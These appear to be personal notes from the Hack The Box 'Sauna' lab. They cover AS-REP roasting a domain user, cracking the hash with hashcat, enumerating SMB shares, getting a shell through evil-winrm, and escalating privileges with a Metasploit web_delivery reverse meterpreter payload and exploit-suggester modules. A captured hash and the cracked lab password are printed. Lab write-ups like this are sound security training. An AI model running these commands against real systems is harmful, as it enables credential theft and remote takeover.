Search

Sauna

Nmap scan:

  • Kerberos
    • Kerberoast?
    • What I did wrong:
      • You can kerberos based on potential users (from a user page) with no pass to gain access
  • SMB secure
    • Can we find user to access it?
  • Website (Microsoft IIS)
    • Can we gain access from here?
    • default credentials?
    • can we use evil winrm (port 5985)?

Kerberoast with no pass:

GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/fsmith

hash:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:d1bcd5f3625c7b622add478d8fa2ba78$6e42f4fb392b684d71bdd565fda2b9e17606fffac94400e33618b3430d25256a964e9f4673b38e878bbbf144eb4710caf7690b5b5a8503a77d021aa3ec524b1ed434f788fb3b129ed55e6d457ccc952bf5dfd4a9540cdf784585afddc5c18c542707cb88e948b7a4e1648f9087a11dc4652c97e8f4f25a94cfc6ad78162006617bdcaf8ea6474ad9b80026c8c2215ecebcb1d4a57775b8fda1f6b2dad5dd0b91de4291a2fea46469a7096c3feeebbfe289f6a7459d49acc749fde6a3c4196764c6873b4add7de5a091211f11d6715e69b5e725af2c13117b9be0769827e300374a8d0b931851400d366e2a0999301dbe3e223966238c457e80f53c7e1b5c5931

Can we crack it?

hashcat -m 13100 egoHash.txt rockyou.txt -O

13100 didn’t work. krb5asrep is 18200!

find it by doing:

hashcat --help | grep Kerberos
hashcat -m 18200 egoHash.txt rockyou.txt -O

cracked user:

fsmith:Thestrokes23

Pass the hash?:

cme smb 192.168.218.0/24 -u fsmith -H Thestrokes23 --local-auth

No, it has to be NTLM hash (we need to crack the hash to

SAM Dump:

cme smb 10.10.10.175 -u fsmith -H Thestrokes23 --local-auth --sam

TGS?

EGOTISTICAL-BANK.local/fsmith

sudo GetUserSPNs.py EGOTISTICAL-BANK.local/fsmith:Thestrokes23 -dc-ip 10.10.10.175 -request

Didn’t work but we found HSmith. Can we kerberoast it?

GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/hsmith

no

Didn’t work. SMB with user?

enumerate smb shares:

cme smb -u 'fsmith' -p 'Thestrokes23' --shares 10.10.10.175

Access the read shares:

smbclient \\\\10.10.10.175\\NETLOGON -U fsmith%Thestrokes23
smbclient \\\\10.10.10.175\\print$ -U fsmith%Thestrokes23
smbclient \\\\10.10.10.175\\RICOH Aficio SP -U fsmith%Thestrokes23

that’s not a folder! exploit?

on metasploit

Needs a session. Ports open for the server?

NEW:

What is WinRM? Port 5985

WinRM | Metasploit Documentation Penetration Testing Software, Pen Testing Security

Gaining access with metasploit not working. Gain a normal shell then web_delivery?

Update?

use scanner/winrm/winrm_login
run http://fsmith:Thestrokes23@10.10.10.175:5985

Um

set domain EGOTISTICAL-BANK.local
set username fsmith
set password Thestrokes23
set rhost 10.10.10.175
run http://fsmith:Thestrokes23@10.10.10.175:5985

still a no

evil winrm:

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

We get a powershell

use it to go to metasploit (web_delivery):

msfconsole
use exploit/multi/script/web_delivery
set lhost tun0
set payload windows/meterpreter/reverse_http
set target 2 #PSH
set srvport 6999
run -j
sessions -i 1

It hangs. x64?

set payload windows/x64/meterpreter/reverse_http

Worked!

background session and try the escalation:

use it to gain access with user then escalate with 

use windows/local/ricoh_driver_privesc
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4445
set session 1
run

Hanging. Try something faster and come back to this if it’s not working?

exploit suggester:

use post/multi/recon/local_exploit_suggester
 1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!                                                                                                                                     
 5   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/cve_2020_17136                           Yes                      The target appears to be vulnerable. A vulnerable Windows 10 v1809 build was detected!                                                                                                                               
 8   exploit/windows/local/cve_2021_40449                           Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!                                                                                                                                     
 9   exploit/windows/local/cve_2022_21882_win32k                    Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.
 11  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 12  exploit/windows/local/ricoh_driver_privesc                     Yes                      The target appears to be vulnerable. Ricoh driver directory has full permissions

Purple worked!